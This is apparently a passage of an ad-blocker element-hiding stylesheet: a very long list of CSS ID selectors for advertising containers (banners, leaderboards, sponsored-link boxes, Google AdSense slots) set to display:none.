div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad